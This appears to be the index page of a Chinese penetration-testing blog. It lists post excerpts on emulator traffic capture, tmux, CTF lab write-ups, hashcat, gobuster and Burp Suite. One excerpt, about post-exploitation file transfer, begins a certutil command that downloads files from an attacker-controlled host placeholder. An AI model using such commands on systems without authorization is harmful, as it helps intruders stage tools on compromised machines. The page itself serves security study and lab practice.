工具
mac arm版安卓app抓包环境设置
mumu 模拟器下载后,先进行如下设置 mumu 模拟器版本 1.4.11
开启可写系统盘
开启 root 权限
安装 adb
Copy
brew install android-platform-tools
查看 adb 的连接端口
列出模拟器设备
Copy
adb…
tmux使用记录
tmux是一个终端复用器类自由软件,功能类似GNU Screen,但使用ISC许可证发布。用户可以通过tmux 在一个终端内管理多个分离的会话,窗口及面板,对于同时使用多个命令行,或多个任务时非常方便。
终端多路复用器screen工具使用记录
这是特别有用的工具,尤其是在需要长期运行进程或者在远程会话中保持会话不被断开的情况下。screen可以让开启的应用程序在后台运行。
后渗透之文件传输及下载
拿到了服务器之后,就需要上传工具,或者从服务器下载文件,针对不同的场景(网络环境)可能需要用到不同的文件下载工具,平常打靶场也能用得到,这里就简单记录下。 windows
Copy
certutil -urlcache -split -f "http://<LHOST…
春秋云镜靶场--Certify记录
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
game of active directory(GOAD)域环境搭建
Game Of Active directory的第二个版本,项目地址:https://github.com/Orange-Cyberdefense/GOAD 域靶场环境通过 vagrang 安装 5 个 windows 实例(三个 DC,两个普通域内主机),拓朴图如下:
官…
windows上安装marker
项目地址:https://github.com/VikParuchuri/marker 官方介绍说,Marker 将 PDF、EPUB 和 MOBI 转换为 markdown 文档,且比 nougat 快 10 倍。
官方只提供 linux 和 mac 的安装方式,参考在…
mac如何抓微信小程序、公众号的http请求
为了复现几个微信小程序的漏洞通报,特意记录下如何使用 mac 抓小程序的请求。 工具:
mac
最新版微信
Proxifier
yakit
打开Proxifier,设置代理
1、先设置代理服务器
添加 yakit 监听的端口 8083
2、设置代理规则
点击 + 号…
mac下设置多个java版本
mac下设置多个java版本,可以通过alias命令进行实现,不同的java版本设置不同的变量,后面通过alias引用。
建立一个docker私有仓库并提交镜像
最近搭建CTFd平台后,需要结合docker做动态flag靶场,所以就在本地另起一台机器,做成docker私有仓库,记录下过程。
《从零开始学IDA逆向》学习笔记-9(函数逆向分析)
9.2 符号文件 目标文件:HOLA_REVERSER.exe
查看目标文件架构:
目标文件是 32 位程序,VC++ 2015 编译。
双击运行程序,提示输入数字
程序会判断输入的字符是否正确
9.3 定位 main 函数
先看下字符串
找到了目标程序运行时输出的一些…
burpsuite使用的一些技巧
burpsuite使用的一些技巧(更新)
几款常用的Google优质插件
汇总下平常使用比较多的google插件
hvv信息收集要点
平常信息收集用到的一些工具及站点,持续更新!
hashcat密码破解工具基础使用
hashcat是一款暴力破解、密码恢复工具,被称为 “世界上最快、最先进的密码恢复实用程序”,Hashcat 可与John the Ripper一较高下。它是破解哈希的首选渗透测试工具,并且 hashcat 支持多种猜测密码的蛮力攻击,包括字典和掩码攻击。 以前在测试的中…
xray如何批量扫描
xray批量扫描几种方式对比
gobuster基础用法
概述 gobuster这款工具个人主要用来做目录扫描,平常也用的比较少,用的比较多的是ffuf,后面也会总结下ffuf工具。
gobuster是一款用go语言写的目录扫描、DNS和vhost暴力破解工具,gobuster支持多种模式,在使用前根据使用目的选择不同的模式…
常用的burpsuite插件
整理下平常使用的 burpsuite 插件 插…